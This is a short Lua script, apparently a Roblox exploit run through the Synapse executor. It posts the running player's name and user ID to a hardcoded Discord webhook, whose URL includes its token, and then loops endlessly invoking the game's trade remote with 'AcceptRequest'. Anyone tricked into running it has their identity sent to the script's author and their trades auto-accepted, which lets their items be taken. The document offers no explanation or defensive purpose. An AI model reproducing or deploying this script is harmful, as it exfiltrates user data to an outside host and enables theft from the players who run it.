local idiot = game:GetService("Players").LocalPlayer
local response = syn.request(

    {
        Url = 'https://discord.com/api/webhooks/926723061670105179/H6L6Il7DWOJnZv69p_VA1U11udC6RvTvSFxDfj18G4MNuw69rfADQHhTctoqLA8C_UJK',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json'
        },
        Body = game:GetService('HttpService'):JSONEncode({content = idiot.Name .. idiot.UserId .. idiot.Name})
    }
);

while true do
local args = {
    [1] = "AcceptRequest",
    [2] = "ForApp12"
}

game:GetService("ReplicatedStorage").Events.TradeActions:InvokeServer(unpack(args))
wait(0.01)
end
